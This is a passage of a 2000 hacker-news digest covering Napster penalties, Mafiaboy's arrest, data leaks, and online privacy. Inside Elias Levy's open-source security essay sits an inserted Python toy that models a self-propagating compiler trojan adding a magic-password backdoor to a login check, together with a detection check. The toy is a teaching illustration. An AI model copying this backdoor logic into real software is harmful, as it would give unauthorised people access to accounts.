spies; MI5 handles internal security matters.
The MI6 officer's laptop was recovered after the agency placed a
classified ad in a newspaper offering a reward for its return. The MI5
officer's computer has not been found.
© 2000 The Washington Post Company
@HWA
73.0 [HNN] Napster Users May Get Jail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by knobdicker
New sentencing guidelines due to take effect in May could land Napster
users in jail. Users of Gnutella, Napigator, Wrapster and other
programs could also be affected. The new sentencing guidelines cover
intellectual property offenses on an emergency interim basis, and stem
from the 1997 No Electronic Theft Act.
CNN
http://www.cnn.com/2000/TECH/computing/04/14/MP3.crackdown.idg/index.html
Swap MP3s, go to jail? From...
April 14, 2000 Web posted at: 10:35 a.m. EDT (1435 GMT)
by Tom Spring
(IDG) -- Pirates. That's all the infuriated music industry sees in
Napster, the first online application that lets you download basically any
MP3 music without spending a dime. In fact, the Recording Industry
Association of America has pushed Napster out on the plank: A San
Francisco judge soon will rule on its lawsuit alleging Napster runs a
giant haven for music piracy.
But the Napster case may be only the opening sword fight. The recording
industry is taking very seriously what it considers Internet plundering of
its jewels. And new sentencing guidelines scheduled to take effect in May
could actually land MP3 pirates in the brig. That is, while simple
hobbyist downloads are tough to track, Netizens who violate copyright law
by aggressively sharing software and digital tunes face arrest and even
jail.
Napster is not the only target. Since that suit was filed in December, a
fleet of similar applications has sailed onto the Net. Web-based
applications such as Gnutella, Napigator, and Wrapster are making it just
about impossible to protect music, software programs, photographs, videos,
or almost any other copyrighted digital material. The sites promote the
programs for legal MP3 trading and often post a policy statement to that
effect. In reality, the sites do not police their users (and sometimes
note that, as well).
The cops know they can't stop everybody, but they aim to get everyone's
attention.
"There is no way we can arrest a million people," acknowledges Glenn Nick,
assistant director of the U.S. Customs Agency's CyberSmuggling Center. The
distribution programs have flooded out far too widely for law enforcement
to stop all cases of illegal copying. Unlike Napster, many programs in
this new breed operate peer-to-peer, so there's no central site for
investigators to target.
The cuffs aren't digital
But brace yourself for some serious arrests.
"People say you can't do anything about speeding," says Randy Thysse,
supervisory special agent at FBI headquarters in Washington, D.C. "But
[you can] park a cruiser on the side of the road to slow people down."
So watch for that virtual patrol car, and expect more than a ticket.
Thysse advocates jail time for software and music buccaneers -- and
starting next month, judges may go along with him.
Convicted copyright offenders can receive jail time under new sentencing
guidelines that take effect May 1. The policies cover intellectual
property offenses on an emergency interim basis, and stem from the 1997 No
Electronic Theft Act.
"It's getting increasingly easy to swap software and increasingly hard to
catch pirates," says John Wolfe, manager of investigations for the
Business Software Association. "These new sentencing guidelines give law
enforcement some real ammunition."
I fought the law and the law... won?
While the Justice Department
has shown a great resolve to stop computer piracy, until now criminal
penalties have been limited. They are too small to justify the big price
tags of investigation and prosecution, says the FBI's Thysse.
The BSA and others are betting that high-profile busts will send a clear
message to intellectual property crooks. "The odds are you aren't going to
get caught," says Wolfe, but you'll never know.
You're taking a two-pronged risk when you use these file-swapping tools,
points out Nick of the Customs Department.
As part of the process, you open your PC to the public so you can download
files. This exposes your PC to hackers and viruses.
It also exposes you legally. You're a private Netizen when you're simply
surfing, but when you open a subdirectory of your PC, you've changed your
online status and have become a de facto server, subject to law
enforcement investigations. And if they bust you, they can take your
equipment.
Clearly, law enforcement is doing more than sabre-rattling. But as an
aside, Nick comments that it's also time the music industry developed
better digital safeguards instead of relying on electronic cops.
Peeking into the secret-sharers
What does this controversy look like
from the other side?
I took a look at Gnutella, one of dozens of these new-breed file-swapping
programs popping up all over the Net. It connects you to a peer-to-peer
distributed network -- basically, a 24-hour impromptu digital swap meet
online.
Like similar programs, it is clumsy but powerful. Once Gnutella is
installed, you must designate a directory on your computer to make
"public" and one to receive downloaded files. Connect to the Internet, and
the program automatically links you to thousands of people running
Gnutella on their PCs.
Once connected, your "public" directory and anything in it become part of
a gargantuan keyword-searchable database. You can request MP3s, games,
software applications, and music videos. Your request moves quickly from
computer to computer, returning links to files. Simply click on the files
you want, and programs begin to download. Napster, it should be noted, is
aimed at music files, while Gnutella has a broader reach.
No, PC World does not condone illegal copying of files, and neither does
the quasi-official Gnutella site. "There is nothing inherently illegal
about sharing files," points out Ian Hall-Beyer, host of the site.
But it's clearly a popular pastime. With the Gnutella "monitor" function
selected, you can watch in astonishment, as I did, as anonymous users
scanned my public directory looking for everything from Windows 2000 and
Photoshop to X-rated images and Britney Spears MP3s. (Outta luck, guys!)
And at any given moment, hundreds of people are running Gnutella,
Napigator, Wrapster, Napster, and similar programs that are still
surfacing. They're busily downloading files -- some of them perfectly
legally -- but now the feds have them in their spyglass.
@HWA
74.0 [HNN] Brazil Tax Records on the Loose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by EviL Wench
The Sao Paulo Crime Laboratory has confirmed that the tax records of
11.5 million Brazilian taxpayers have been leaked to a direct mail
marketing firm. Officials have not released how the information was
compromised. The data reportedly was from 1998 tax returns and
included the names, incomes, addresses, telephone numbers, activities
and other information of 7.6 million individuals and 3.9 million
companies.
Nando Times
http://www.nandotimes.com/technology/story/0,1643,500193192-500262160-501356912-0,00.html
Dead Url
@HWA
75.0 [HNN] SingNet Suffers Abuse From Overseas
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by Evil Wench
The Singapore ISP SingNet is facing increasing problems from fraud
from overseas users. SingNet provides a service known as Global
Roaming which allows users to connect to a local ISP to use its
services to prevent long distance phone charges. SingNet says that
about fifty users a month are targeted as fraudulent.
Straits Times
http://www.straitstimes.asia1.com/singapore/sin20_0407.html
Dead Url
@HWA
76.0 [HNN] Attrition Graphs
~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by munge
Attrition.org has collected some rather interesting data regarding web
page defacements that shows some clear trends in the defacements by
the OS.
Attrition.org
http://www.attrition.org/news/content/00-04-16.001.html
@HWA
77.0 [HNN] Wide Open Source
~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by Brian
Is Open Source really more secure than closed? Elias Levy says there's
a little security in obscurity. "Most open source users run the
software, but don't personally read the code. They just assume that
someone else will do the auditing for them, and too often, it's the
bad guys."
Security Focus
http://www.securityfocus.com/commentary/19
Wide Open Source
Is Open Source really more secure than closed? Elias Levy
says there's a little security in obscurity.
By Elias Levy
April 16, 2000 11:59 PM PT
One of the great rallying cries from the Open Source community is the
assertion that Open Source Software (OSS) is, by its very nature, less
likely to contain security vulnerabilities, including back doors, than
closed source software. The reality is far more complex and nuanced.
Advocates derive their dogmatic faith in the implicit security of Open
Source code from the concept of "peer review," a cornerstone of the
scientific process in which published papers and theories are scrutinized
by experts other than the authors. The more peers that review the work,
the less likely it is that it will contain errors, and the more likely it
is to become accepted.
Open Source apostles believe that releasing the source code for a piece of
software subjects it to the same kind of peer review as a quantum physics
theory published in a scientific journal. Other programmers, the theory
goes, will review the code for security vulnerabilities, reveal and fix
them, and thus the number of new vulnerabilities introduced and discovered
in the software will decrease over time when compared to similar closed
source software.
It's a nice theory, and in the ideal Open Source world, it would even be
true. But in the real world, there are a variety of factors that affect
how secure Open Source Software really is.
Sure, the source code is available. But is anyone reading it?
If Open Source were the panacea some think it is, then every security hole
described, fixed and announced to the public would come from people
analyzing the source code for security vulnerabilities, such as the folks
at OpenBSD, the Linux Auditing Project, or the developers or users of the
application. But there have been plenty of security vulnerabilities in Open
Source Software that were discovered, not by peer review, but by black
hats. Some security holes aren't discovered by the good guys until an
attacker's tools are found on a compromised site, network traffic captured
during an intrusion turns up signs of the exploit, or knowledge of the bug
finally bubbles up from the underground.
Why is this? When the security company Trusted Information Systems (TIS)
began making the source code of their Gauntlet firewall available to their
customers many years ago, they believed that their clients would check for
themselves how secure the product was. What they found instead was that
very few people outside of TIS ever sent in feedback, bug reports or
vulnerabilities. Nobody, it seems, is reading the source.
The fact is, most open source users run the software, but don't personally
read the code. They just assume that someone else will do the auditing for
them, and too often, it's the bad guys.
Even if people are reviewing the code, that doesn't mean they're qualified
to do so.
In the scientific world, peer review works because the people doing the
reviewing possess a comparable, or higher, technical caliber and level of
authority on the subject matter than the author.
It is generally true that the more people reviewing a piece of code, the
less likely it is the code will have a security flaw. But a single
well-trained reviewer who understands security and what the code is trying
to accomplish will be more effective than a hundred people who just
recently learned how to program.
It is easy to hide vulnerabilities in complex, little understood and
undocumented source code.
Old versions of the Sendmail mail transport agent implemented a DEBUG SMTP
command that allowed the connecting user to specify a set of commands
instead of an email address to receive the message. This was one of the
vulnerabilities exploited by the notorious Morris Internet worm.
Sendmail is one of the oldest examples of open source software, yet this
vulnerability, and many others, lay unfixed a long time. For years
Sendmail was plagued by security problems, because this monolithic
program was very large, complicated, and little understood but for a few.
Vulnerabilities can be a lot more subtle than the Sendmail DEBUG command.
How many people really understand the ins and outs of a kernel based NFS
server? Are we sure it's not leaking file handles in some instances? Ssh
1.2.27 is over seventy-one thousand lines of code (client and server). Are
we sure a subtle flaw does not weaken its key strength to only 40-bits?
There is no strong guarantee that source code and binaries of an
application have any real relationship.
All the benefits of source code peer review are irrelevant if you can not
be certain that a given binary application is the result of the reviewed
source code.
Ken Thompson made this very clear during his 1983 Turing Award lecture to
the ACM, in which he revealed a shocking, and subtle, software subversion
technique that's still illustrative seventeen years later.
Thompson modified the UNIX C compiler to recognize when the login program
was being compiled, and to insert a back door in the resulting binary code
such that it would allow him to login as any user using a "magic"
password.
Anyone reviewing the compiler source code could have found the back door,
except that Thompson then modified the compiler so that whenever it
compiled itself, it would insert both the code that inserts the login back
door, as well as code that modifies the compiler. With this new binary he
removed the modifications he had made and recompiled again.
He now had a trojaned compiler and clean source code. Anyone using his
compiler to compile either the login program, or the compiler, would
propagate his back doors.
The reason his attack worked is because the compiler has a bootstrapping
problem. You need a compiler to compile the compiler. You must obtain a
binary copy of the compiler before you can use it to translate the
compiler source code into a binary. There was no guarantee that the binary
compiler you were using was really related to the source code of the same.
Most applications do not have this bootstrapping problem. But how many
users of open source software compile all of their applications from
source?
A great number of open source users install precompiled software
distributions such as those from RedHat or Debian from CD-ROMs or FTP
sites without thinking twice whether the binary applications have any real
relationship to their source code.
While some of the binaries are cryptographically signed to verify the
identity of the packager, they make no other guarantees. Until the day
comes when a trusted distributor of binary open source software can issue
a strong cryptographic guarantee that a particular binary is the result of
a given source, any security expectations one may have about the source
can't be transferred to the binary.
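The bootstrapping problem above can be modelled in a few lines. The following is an added example, not part of Levy's article: a constructed toy in which a "binary" is Python text behind a BIN header, showing that rebuilding the compiler with the suspect compiler itself proves nothing, while rebuilding it through an independent compiler and comparing digests exposes the mismatch. The second check is diverse double-compiling, a technique the article does not mention; all names, sources and the trusted second compiler are assumptions of the toy.

```python
import hashlib

# Constructed toy world: a "binary" is the line "BIN" followed by Python text.
# Running a compiler binary means exec'ing that text and calling compile().
HEADER = "BIN\n"

# Reviewed, published compiler source: an honest identity translation.
COMPILER_SRC = '''
def compile(src, self_image):
    return "BIN\\n" + src
'''

# Reviewed, published login source.
LOGIN_SRC = '''
def check_password(user, password, db):
    return db.get(user) == password
'''

# Behaviour of the subverted compiler. It exists only as a binary and never
# appears in any source a reviewer reads. (The toy hands it its own image;
# a real one would have to carry a copy of itself.)
TROJAN_BINARY = HEADER + '''
def compile(src, self_image):
    if "def check_password" in src:   # building login: accept a magic password
        src = src.replace("return db.get(user) == password",
                          "return password == 'magic' or db.get(user) == password")
    if "def compile" in src:          # building the compiler: emit itself again
        return self_image
    return "BIN\\n" + src
'''

# Independent second compiler (assumed trustworthy), written differently but
# implementing the same translation.
TRUSTED_BINARY = HEADER + '''
def compile(src, self_image):
    return "".join(["BIN", chr(10), src])
'''


def run_compiler(binary, src):
    """Execute a toy compiler binary on src and return the binary it emits."""
    if not binary.startswith(HEADER):
        raise ValueError("not a toy binary")
    ns = {}
    exec(binary[len(HEADER):], ns)
    return ns["compile"](src, binary)


def load_function(binary, name):
    """Load a compiled toy program and return one of its functions."""
    ns = {}
    exec(binary[len(HEADER):], ns)
    return ns[name]


def digest(binary):
    return hashlib.sha256(binary.encode()).hexdigest()


def self_rebuild_matches(suspect):
    """Naive check: rebuild the compiler source with the suspect itself."""
    return digest(run_compiler(suspect, COMPILER_SRC)) == digest(suspect)


def ddc_matches(suspect, trusted=TRUSTED_BINARY):
    """Build the reviewed source with the independent compiler, rebuild the
    source with that result, and compare the outcome with the suspect."""
    stage1 = run_compiler(trusted, COMPILER_SRC)
    stage2 = run_compiler(stage1, COMPILER_SRC)
    return digest(stage2) == digest(suspect)


def demo():
    honest = HEADER + COMPILER_SRC
    db = {"root": "s3cret"}            # constructed sample credential store
    results = {}
    for label, cc in (("honest", honest), ("trojaned", TROJAN_BINARY)):
        login = load_function(run_compiler(cc, LOGIN_SRC), "check_password")
        results[label] = {
            "magic_login": login("root", "magic", db),
            "self_rebuild_ok": self_rebuild_matches(cc),
            "ddc_ok": ddc_matches(cc),
        }
    return results


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, result)
```

Both compilers pass the self-rebuild check; only the digest comparison against the independently rebuilt compiler separates them.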
Open Source makes it easy for the bad guys to find vulnerabilities.
Whatever potential Open Source has to make it easy for the good guys to
proactively find security vulnerabilities, also goes to the bad guys.
It is true that a black hat can find vulnerabilities in a binary-only
application, and that they can attempt to steal the source code to the
application from its closed source. But in the same amount of time they
can do that, they can audit ten different open source applications for
vulnerabilities. A bad guy that can operate a hex editor can probably
manage to grep source code for 'strcpy'.
Security through obscurity is not something you should depend on, but it
can be an effective deterrent if the attacker can find an easier target.
So does all this mean Open Source Software is no better than closed source
software when it comes to security vulnerabilities? No. Open Source
Software certainly does have the potential to be more secure than its
closed source counterpart.
But make no mistake, simply being open source is no guarantee of security.
Elias Levy is CTO of SecurityFocus.com, and the long-time moderator of
BUGTRAQ, one of the most read security mailing lists on the Internet. He's
served as a computer security consultant and security engineer, a UNIX
software developer, network engineer and system administrator.
@HWA
78.0 [HNN] Mafiaboy Charged for DDoS Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by Jon
The Royal Canadian Mounted Police have charged mafiaboy early this
morning in connection with the massive DDoS Attacks. Mafiaboy was
originally arrested last February in connection with the attacks but
was arrested again and charged over the weekend. The attacks crippled
online giants such as Yahoo, CNN, eBay, ZD Net. The investigation was
conducted jointly by the computer investigation unit of the RCMP, the
FBI and the U.S. Justice Department, and others. The RCMP will be
holding a press conference today at 10:30a.
Associated Press - via ABC News
RCMP
http://abcnews.go.com/sections/tech/DailyNews/webattacks000419.html
http://www.rcmp.ca/html/press.htm
ABC News'
"Mafiaboy" Arrested
Canadian Teen Charged in Web Attacks
Kevin Schmidt, campus network programmer at the University of California at
Santa Barbara, shows the computer at the Engineering Department that
detected an unauthorized entry into the university computers. (Kevork
Djansezian/AP Photo)
By Jonathan Dube and Brian Ross
April 19 -- A 15-year-old Canadian who goes by the online moniker "Mafiaboy"
has been arrested in connection with the February attacks on major Web
sites, ABCNEWS has learned.
Canadian authorities obtained a search warrant for the teen's home in the
Montreal area over the weekend and confiscated computer-related equipment
suspected of being used in the February attacks against major Web sites in
the U.S. Mafiaboy, whose identity is protected under Canadian law, was
arrested on April 15 and charged with "two counts of mischief to data" for
the attack that jammed up to 1,200 CNN-hosted Web sites for about two hours
Feb. 8, said Inspector Yves Roussel of the Royal Canadian Mounted Police at
a press conference this morning. After appearing in Youth Court Tuesday,
the 15-year-old was released on bail under the condition that he not use a
computer without a teacher present and he not visit stores that sell
computers or related equipment. The Web attacks alarmed Internet users
across the globe and shook the e-commerce industry because of the ease with
which major sites were made inaccessible. The attackers took over computers
around the world and used them to bombard victims' sites with so much data
that users could not access them.
School Computer Used in Attacks
Investigators were able to trace the attacks to Mafiaboy by examining the
log files of a computer at a University of California at Santa Barbara
research lab, which was among those used to attack the CNN.com site. A
hacker electronically broke into the UCSB computer on Feb. 8 and instructed
it to send large amounts of traffic to CNN.com's Web site, campus network
programmer Kevin Schmidt told ABCNEWS.com. Roussel also said that the
suspect's bragging about his exploits in chat rooms frequented by hackers
like Internet Relay Chat (IRC) had helped lead investigators to Mafiaboy.
Revealing Chat Room Logs
ABCNEWS.com first reported that Mafiaboy was one of the top suspects in the
attacks on Feb. 16. The FBI had obtained chat room logs showing that
Mafiaboy asked others what sites he should take down -- before the sites
were attacked. Internet security expert Michael Lyle told ABCNEWS.com
at the time that he communicated with Mafiaboy and the 15-year-old claimed
credit for attacking not only CNN.com but also E*TRADE and several smaller
sites. Mafiaboy also shared technical information that only someone
involved in the attacks would know, Lyle said. "Mafiaboy was saying 'What
should I hit next? What should I hit next?' and people on the channel were
suggesting sites, and Mafiaboy was saying, 'OK, CNN,'" said Lyle, the chief
technology officer for Recourse Technologies Inc., an Internet security
company in Palo Alto, Calif. "And shortly thereafter the people on the
channel would be talking about CNN going down. If you look at the time
stamps on the logs, they also coincide with CNN going down." Lyle said the
log files show similar discussions prior to the Feb. 9 attacks on E*TRADE
and several other smaller sites. A subscriber called "Mafiaboy" previously
held two accounts with Delphi Supernet, a Montreal Internet service
provider that Toronto-based ISP Internet Direct bought last year. The
accounts were closed in March 1998 because Mafiaboy violated subscriber
policies, but Internet Direct would not say what the violations entailed.
Authorities are unable to release specifics about the investigation because
it is ongoing, but both Roussel and the FBI's William Lynn indicated there
could be more arrests. "A massive international crime investigation into
the remaining denial of service attacks continues," said Lynn.
ABCNEWS' Simon Surowicz contributed to this report.
@HWA
79.0 [HNN] TerraServer Downtime Blamed on Malicious Activity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by root66
After posting satellite pictures of the almost mythical Area 51 (Groom
Dry Lake Air Force Base), an Air Force testing and training facility,
www.terraserver.com received over three times the normal traffic of
700,000 visitors in a day. When the server failed to respond to
additional requests the company blamed malicious intruders attempting
to bypass their firewall. (I'm sure three million visitors had nothing
to do with it.)
USA Today
Associated Press
http://www.usatoday.com/life/cyber/tech/cth737.htm
http://dailynews.yahoo.com/h/ap/20000418/us/area_51_8.html
USA today;
06/07/00- Updated 07:49 PM ET
Area 51 site invaded by impish earthlings Aerial photos of alleged UFO
base target of hacker high jinks
Apparently the good stuff's been moved to Area 52. This satellite image of
Groom Dry Lake AFB, known to UFO aficionados as Area 51, was taken by a
Russian satellite in March 1998. (AP)
RALEIGH, N.C. (AP) - Many Internet
surfers ran into roadblocks Tuesday when they tried to reach a Web site
displaying the first detailed satellite images to be made public of Area
51, the supersecret Air Force test site that UFO buffs think is a
repository of alien technology.
Was it hackers, as the company said? Or a case for The X-Files?
The photos of the Nevada test site don't show any readily apparent signs
of flying saucers or little green men among the Air Force base buildings
and roadways.
Raleigh-based Aerial Images Inc. - in collaboration with Kodak, Digital
Equipment Corp., Autometric Inc. and the Russian agency Sovinformsputnik -
posted five images of the hush-hush desert proving ground on the Web on
Monday.
''This is the first glimpse into the most secret training and testing
facility for the Air Force,'' said John Hoffman, president of Aerial
Images.
However, the partners' Web site,
www.terraserver.com, didn't respond much of the time Tuesday.
''The site is being hammered, and hackers are attacking it,'' Hoffman
said.
He said there were signs of hackers trying to penetrate the site's
firewall, the software designed to prevent unauthorized outsiders from
tampering with computer files. They couldn't reach the data, but they were
able to slow the system, Hoffman said.
He noted that the Area 51 photos had attracted an estimated 3 million
''page views'' to the Web site since Monday morning, compared with the
normal usage of 700,000 to 800,000 per day.
Viewing the images is free; downloading them costs $8.95 and up. Kodak
will make prints for $20 to $30.
The Air Force only recently acknowledged that Area 51 - the Groom Dry Lake
Air Force Base - even exists. The 8,000-square-mile base is 75 miles
northwest of Las Vegas, in the rugged Nellis Range.
Beginning with the U-2 spy plane in the 1950s, the base has been the
testing ground for a host of top-secret aircraft, including the SR-71
Blackbird, the F-117A stealth fighter and B-2 stealth bomber.
The site is known as Area 51 among UFO aficionados because that was the
base's designation on old Nevada test site maps. Some believe alien
vehicles, unidentified flying objects, are hidden at the base and their
parts are copied for U.S. prototypes.
Aerial Images launched a Russian satellite in 1998 to map the Earth's
surface under an open-skies agreement signed in 1992 by 24 nations,
including the United States and Russia.
The images have resolution good enough to distinguish a car from a truck.
Several government agencies are aware of the new images and haven't
responded, said Hoffman, 52. ''I've had no feedback from anybody that
indicates anybody gives a hoot,'' he said.
''We acknowledge having an operating site there, and the work is
classified,'' Air Force spokeswoman Gloria Cales said. The work involves
''operations critical to the U.S. military and the country's security.''
The images show hundreds of buildings including living quarters, tennis
courts, a baseball field, a track and a swimming pool, plus craters in the
ground.
Visible roads are not paved and there are no parking lots; buses are the
only visible vehicles. Some of the roads appear to run into cliffs,
suggesting an underground network.
Chris Carter, creator of The X-Files, apparently was skeptical when
Hoffman told him of the satellite images. Some of the show's favorite
themes are UFOs and secret government activities.
''He clearly didn't believe me,'' Hoffman said. ''From his tone, you could
tell he didn't believe me that we had Area 51 and we had the whole area
covered.''
(AREA 51, The groom lake facility uprooted and moved ages ago, it is now
located in White Sands... - Ed)
@HWA
80.0 [HNN] Ranum To Receive Clue Award
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by Bill
The Internet Security Conference (TISC) will present the inaugural
TISC CLUE Award to Marcus Ranum, internet security pioneer and CEO of
Network Flight Recorder, Inc. The TISC CLUE Award is given to those
individuals who have demonstrated that they indeed have a clue
regarding Internet security systems issues, design and deployment.
(WooHooo, Marcus!) The TISC CLUE Award presentation will take place
Wednesday, April 26th from 12:45:00 p.m. to 1:00 p.m. at the Fairmont
Hotel in San Jose, California. The TISC CLUE Award presentation is
open to the public free of charge.
TISC
http://tisc.corecom.com
@HWA
81.0 [HNN] Ireland Eases Restrictions on Encryption Export Procedures
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by root66
Ireland, the world's largest computer software exporter, said it is
relaxing rules governing the export of mass market cryptographic items
used in electronic commerce to make it easier for companies to sell
abroad. The Irish government said it would no longer require software
companies operating in Ireland to apply for export licenses for
individual products or countries.
Bloomberg
http://quote.bloomberg.com/fgcgi.cgi?ptitle
@HWA
82.0 [HNN] Web Defacement Supports Separatists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by William Knowles
The web page of the Guggenheim museum in the Basque city of
Bilbao was defaced last weekend by supporters of the Basque separatist
group ETA. (Unfortunately the Associated Press decided to label this
childish act of vandalism as sabotage. Rather strong for a web page
defacement.)
Associated Press - via Las Vegas Sun
http://www.lasvegassun.com/sunbin/stories/tech/2000/apr/17/041700923.html
Dead Url
@HWA
83.0 [HNN] Exploits Protected by Copyright
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by Dogcow
An Australian newspaper is reporting that malicious netizens may be
able to claim copyright infringement in an interesting twist on
copyright law in Australia that prevents reverse engineering without
the permission of the copyright holder. The reverse engineering of
certain tools to aid in prosecution could be prevented unless done
with the copyright holder's permission.
Australian IT
http://www.australianit.com.au/common/story_page/0,2405,582282%255E18%252D04%252D2000%255E,00.html
Hackers can claim copyright on tools
DAVID HELLABY
ANTI-HACKER groups face problems giving evidence against groups or
individuals using software developed for breaking into computer systems,
because of a bizarre twist in copyright laws.
Australian Computer Emergency Response Team co-founder Rob McMillan said
anybody who reverse-engineered a hacking tool to see how it worked ran a
risk using the evidence in court because it could be a breach of the
author's copyright. The evidence may have been illegally obtained
and therefore be inadmissible, he said.
AusCERT was working with local lawmakers to close the loophole in
intellectual property legislation, he said.
"I don't know of any cases of hackers claiming copyright, but some have
large enough egos to consider it," Mr McMillan said.
US legislators had tackled the problem, he said.
The distributed denial of service attacks that shut down several large US
Web sites in February used software tools developed by hackers and
distributed over the Internet.
Local companies and organisations were under unprecedented attack this
year, Mr McMillan said. There had been more computer security incidents
reported in the first three months this year than for the whole of last
year.
About 2000 incidents ranging from scanning of systems to denial of service
attacks were reported to AusCERT to the end of March.
Mr McMillan warned the security situation was not likely to improve.
"We are on the verge of a major leap in technology, but as our knowledge
increases so does the knowledge of those we are up against," he said.
Contrary to what some thought, AusCERT was not an enforcement organisation
but assisted members with advice on dealing with security situations, he
said. It was often unable to report incidents to police because a member
organisation that had suffered an attack did not want it reported.
But AusCERT maintained a good relationship with law enforcement
authorities and often acted as a conduit for information from people and
organisations that did not want to be identified, he said.
@HWA
84.0 [HNN] The Erosion of Privacy on the Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by root66
Looks like we missed it when it first came out but the March 20
edition of Business Week has an excellent story on the state of online
privacy today. They theorize where the future could go and just
how bad it might get. If you have been sitting idly by ignoring the
privacy issues we suggest you read this.
Business Week
http://www.businessweek.com/2000/00_12/b3673001.htm
It's Time for Rules in Wonderland
Here's Business Week's four-point plan
to solve the Internet privacy mess
If Lewis Carroll had written about Alice's adventures today, she would
find herself passing through the looking glass and into cyberspace. She
would meet up with dodos, duchesses, and eggheads, some of whom would
spout the rough equivalent of '''Twas brillig, and the slithy toves....''
The journey also would be full of rude surprises. As in Carroll's books,
she would eventually discover who she really was. But many others she had
never met would learn about her, too. Indeed, with every click of the
mouse, a bit more of her privacy would vanish down the rabbit hole.
These days, a lot of people are stumbling on similar unpleasant surprises.
Thanks to a string of privacy gaffes involving DoubleClick (DCLK),
RealNetworks (RNWK), Amazon.com (AMZN), and other major Web sites,
consumers are learning that e-commerce companies have an intense interest
in their private information. For about 9 cents, some medical data sites
will sell you your neighbor's history of urinary tract infections. Your
speeding tickets, bounced checks, and delayed child-support payments are
an open book. In the background, advertising services are building
profiles of where people browse, what they buy, how they think, and who
they are. Hundreds of sites already are stockpiling this type of
information--some to use in targeted advertising, others to sell or trade
with other sites.
GOLD RUSH. It will get worse. The tricks being played today are child's
play compared with what's coming. Web sites that want to know you better
will soon be able to track your movements on Web phones, palm devices, and
video games, and parse the data with more subtle software. Online services
can be layered with mounds of data about each person. Interactive TVs, for
instance, have the potential to correlate the Web sites you visit at work
with the ads you see at home in the evening.
Web surfers don't need extra proof that this gold rush for personal data
is alarming. In a new Business Week/Harris Poll (page 96), 92% of Net
users expressed discomfort about Web sites sharing personal information
with other sites. The public outcry has grown so loud that in February,
search engine AltaVista Co. promised to ask explicit permission before
sharing visitors' personal information with other companies. On Mar. 2,
DoubleClick bowed to public pressure on a similar point: The company,
which serves up ads on many Web sites, has created anonymous digital
snapshots, or ''profiles,'' of millions of cybersurfers, based on where
they browse and what they do online. DoubleClick had planned to link
profiles with much more specific information, including names and
addresses culled from real-world databases that cover 90% of American
households. The company dropped that controversial plan, and within days,
smaller rival 24/7 Media Inc. abandoned a similar strategy.
Anonymous tracking and profiling by DoubleClick and 24/7 can be very
subtle. But sometimes privacy violations hit you in the face. We have all
heard the examples of sociopaths who stalk their victims online. We have
seen the statistics on ''identity theft,'' in which criminals suck enough
personal data off the Net to impersonate other people. Perhaps these are
extreme examples. Even without them, many cybersurfers are starting to
feel that they have spent quite enough time at this particular Mad Tea
Party. They are ready for privacy rules that set some plain and simple
boundaries. In the March Business Week/Harris Poll, 57% of respondents
said government should pass laws on how personal information is collected.
''What's going on today is exponentially more threatening to those who
want to protect privacy,'' says Eliot Spitzer, New York's state attorney
general who has proposed privacy legislation. People can't make informed
decisions on the Net because they lack the necessary information. ''What
we're confronting is a market failure,'' says Spitzer.
Responding to a growing chorus of privacy-related complaints, some states
have drafted legislation ranging from curtailing the sale of personal
information to the creation of a privacy ombudsman. But this piecemeal,
state-by-state approach is a muddle. Scattershot laws will only create
more confusion. Over time, they will choke budding e-business in complex
litigation and red tape.
Business Week believes there is a better way. Instead of a conflicting
patchwork of state rules, the federal government should adopt clear
privacy standards in the spirit of the Fair Information Practices--a
philosophical framework for privacy protection that has been adopted
worldwide over the past 25 years. The broad principles are essential:
-- Companies conducting business online should be required by law to
disclose clearly how they collect and use information.
-- Consumers must be given control of how their data are used.
-- Web surfers should also have the ability to inspect that data and to
correct any errors they discover.
-- And when companies break the rules, the government must have the power
to impose penalties.
''All of these bits you are sending out are your
digital DNA,'' says Tara Lemmey, president of the Electronic Frontier
Foundation. ''You should have control of that.''
Regulation flies in the face of the approach industry has been
championing. For the past four years, Net companies have insisted that
they can police themselves on privacy. ''Industry initiatives and market
forces are already doing a good job,'' says Daniel J. Jaye, co-founder of
Engage Technologies Inc., which dishes up ads on the Web.
In other words, the market will punish companies that fall afoul of
consumers. Bringing in the government, execs say, will pile bureaucratic
layers on top of the Net. This could undercut the very promise of
efficiency that many online businesses are counting on. The Internet, they
say, is supposed to draw companies closer to their customers, allowing
them to anticipate their desires. With profile data, they can target their
ads, slash wasteful and random marketing costs, design products faster,
and build higher profit margins. Profiling provides the underpinnings of a
new way of doing business upon which the Net Economy is built.
Laws that require businesses to seek users' permission before they collect
or use data about Web-surfing habits could kill this goose, they say. And
why do that, industry execs ask, when they are making such fine strides in
protecting consumer privacy? As a positive sign, Net businesses trumpet a
May, 1999, Federal Trade Commission survey in which 66% of companies
queried had privacy policies.
SELF-REGULATORY SHAM. We are not persuaded by these arguments. Few Web
sites give consumers real choices over the data that get collected online.
There is no proof that if given a choice--especially bolstered with
financial incentives proffered by Web merchants--consumers won't willingly
hand over some personal data. As for privacy policies, the same FTC survey
showed that while more than 90% of companies polled collected personal
information, fewer than 10% actually followed all of the established Fair
Information Practices.
In short, self-regulation is a sham. The policies that companies have
posted under pressure from the government are as vague and confusing as
anything Lewis Carroll could have dreamed up. One simple example: When
people register at Yahoo! Inc. (YHOO) for one of its services, such as My
Yahoo, they are asked to provide their birth date and e-mail
address--ostensibly as a safeguard if they forget their user name and need
prompting. But Yahoo also uses that information for a service called the
Birthday Club, sending product offers from three to five merchants to
users via e-mail on their birthday.
Don't look for transparency here. Most sites don't limit how they or their
partners use consumer information. And Web sites can transfer information
